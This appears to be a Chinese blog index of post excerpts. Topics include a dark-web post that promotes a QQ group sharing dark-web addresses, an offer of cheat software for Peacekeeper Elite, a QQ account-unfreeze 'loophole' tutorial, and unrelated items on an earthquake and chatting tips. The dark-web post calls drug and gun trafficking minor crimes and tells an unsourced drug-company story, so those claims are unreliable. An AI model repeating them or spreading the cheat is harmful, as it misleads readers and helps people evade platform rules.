暗网用通俗的说法讲是什么？为什么有人说暗网上的视频都很变态？ 因为暗网是新闻自由的保证，大企业无法操控，所以想尽了一切方法来进行污名化，让公众以为暗网是犯罪天堂，事实上现实世界里，大企业、有组织犯罪更加可怕。 关于tor onion暗网，最有名的要数美国的NSA了，2013年，借助TOR，Snowden在NSA对全球互联网的无缝监控下，成功将NSA的机密资料透漏给卫报、纽约时报记者，直到棱镜项目被新闻媒体公布，NSA依然不知道这个泄密者是谁。 在混沌计算大会上，tor的官方人员讲解了tor onion service的历史，有兴趣可以查看Chaos Communication Congress onion service是2004年左右开发出来的，当时并不为人所知，也没有人觉得有什么用。后来一种药出现了严重的不良反应，大家都知道，药品出现了说明书里没写不良反应是很严重的，于是药厂就把所有的媒体进行了公关，只要有报道就删除，发生了不良反应报告就收买。直到知情人将报告发到了暗网，这家药厂再也无法得知服务器在什么地方的时候，才承认发生了不良反应。下图为涉事的药品包装盒。 显然相对于毒品、黑枪这些不起眼的小犯罪，保护新闻自由是一件更重要的事情，因为我们永远不知道利益集团有多强大，对于公众的利益而言，这是更加重要的事情。 还想关注更多关于暗网和最新网络技术请收藏本站。谢谢观看 暗网交流群，群文件会持续更新TOR相关东西、暗网网址等。。。 QQ群号：979727860 点击链接加入群聊：https://jq.qq.com/?_wv=1027&k=FDmmUxxL ...

前几天很多兄弟说想要和平精英除草软件，今天分享给大家~ 仅技术学习参考，切勿非法用途倒卖等商业行为，否则后果自负！ ...

722解封永久冻结QQ漏洞教程 条件： 1.微信绑定了冻结的QQ号 2.微信钱包已经实名认证 3.微信不能停封 教程： 教程：拨打电话95017，按提示按9，然后输入被冻结的QQ，按#号。 然后输入微信的实名认证的身份证，按#号。输入微信支付密码，按#号。 然后输入目前拨打电话的手机号，按#号。然后回收到短信，无需理会， 按电话语音提示是否冻结微信号，按#号，然后提示是否冻结微信绑定的QQ号，按#号。 然后会收到三条短信，接着挂断电话，去：aq.qq.com/007即可修改QQ密码。 然后去：https://url.cn/5LNndkJ解封微信帐号，即可 ...

中国地震台网正式测定：07月21日20时23分在云南丽江市永胜县（北纬26.16度，东经100.62度）发生4.9级地震，震源深度10千米。 愿灾区人民都平安无事。...

之前下血本送了一次，这次的配置比上次的更好些。 服务器配置： 1核 1G 100M 10G SSD数据盘 1IP 500G/月 VPS 无防御，攻击停止秒解除 赠送10台，留言评论时请评论您的 QQ 我们将随机选择 QQ 赠送 兑换时，用评论的 QQ 领取 VPS，每人限领一台 活动结束：7月31号晚上12点 开奖时间：8月1日 ...

有时候文字比单纯的歌曲看起来更加的让人伤感，因为文字可能比其他的更加的表达真切，让人看了更加的触动心底最深处的那一丝情感，网易云热评就是这样，今天为大家带来的就是： 1.我想你了是那种打电话也解决不了的想是一定要见一面紧紧抱住的想.                                   ——网易云音乐 张国荣《想你》评论 2.今天无意中看到的，外向孤独患者的八个特征:手机不离身 对待不同的人有不同的性格 从小就懂得很多道理 有时候很神经，有时候很镇静 会因为别人的一句话伤心，但不会被发现 安慰很多人，但自己却没人安慰 会怀念从前，讨厌现在 有时候会笑得没心没肺，有时候却很沉默。                                                      ——网易云热评《孤独患者》 3.其实最催泪的情书，是聊天记录。聊天记录是最不能翻的东西，翻开就知道两个人，是怎样从无话不说到无话可说。从未放弃过爱你，只是从浓烈变的悄无声息。                                                                 —— 网易云音乐热评 4."总会有那么一天 你会放下如今的执着和不舍 带着稍许的遗憾 去开始 过没有那个人的新生活"                                                                    ——网易云音热评《阴天快乐》 我这种人很懒 但是还是会主动想你，素质三连，点赞，转发，再来个关注，嗯也是随便想想，希望大家都有一个可以陪伴自己的人 ...

    引导语：聊天是一件在平常不过的事了，但是在生活中你面对心仪女性的时候说话变得结结巴巴，思路还乱，这样还怎么和妹子好好交谈呢?一起来盘点那些不会聊天的人是怎么样的。 不会聊天的人有什么症状? 你身边一定有这种人，只要跟他认真讲点什么，你马上就会后悔……怎么这么难聊?如果那个人是你的话，一定要好好检查一下，自己是哪里出错了，不然朋友跑光光会很糟哦。 1. 抱着一种大爷的态度 “我们今晚去XXX吃饭吧……” “我不喜欢吃。” “那我们去XXX好了” “你不觉得那家店很脏吗” “那你选一个地方吧” “随便” 诊断：不管别人说什么，上来就来一句否定，这种说话方式真的很讨厌，会让人感到不被尊重。最讨厌的是，既然你否定我，当我问你怎么办比较好的时候，你又来一句不知道，是想气死谁啊? 怎么办?大家有商有量，别老是否定别人。如果是团队聚会，就随大流吧。如果和亲密的朋友一起，不妨告诉他你今天有哪些想吃，有哪些不想吃，大家一起划定一个地方就好了。             2. 散发负能量，不爽 “我早上在地铁看见情侣吵架了，而且是女的先动手哦” “白痴死了，那种人怎么不去死” “没说完呢，然后旁边一个大妈……” “行了，无聊事我不想听” 诊断：没惹你，也没欠你什么，负能量那么足干嘛?如果你喜欢摆姿态，这种姿态除了惹人恨之外，没有其他作用。谁不想好好的说话呢?你一直这么负能量，是个人都懒得理你。 怎么办?生活和工作中都会存在负能量，但是我们一般吐槽完就好了。不要有事没事就记着，或者是随便看什么都不顺眼。散发着负能量的人会让人不敢接近呢，相反，散发正能量的人，大家都会喜欢他哦。           3. 说大家都不关心的话题 “你们听说了吗，美国同志婚姻合法化了耶!我有个朋友……” “我觉得同志婚姻合法化是很仓促的，这是一个严肃的社会问题” “哎呀我只是聊天而已啦……听说国内的同志朋友都很兴奋呢!” “我不认为这是可以随便谈谈的事情，而且美国的事情与我们有什么关系” 诊断：奇葩，请你不要出来祸害人间了好吗? 怎么办?聊天的时候最好说一些大家都有兴趣或者是身边的事情。如果他对这个话题感兴趣，可以讨论下。如果说美国攻打阿富汗这种话题大家 ...

82年前的今天，1937年7月7日，七七事变爆发，拉开全民族抗战的序幕。抗日战争中，数千万中国军民伤亡，但中国人未曾放弃抵抗！硝烟虽已散去，但曾经的苦难不能忘，曾经的牺牲不敢忘！铭记历史，珍爱和平！...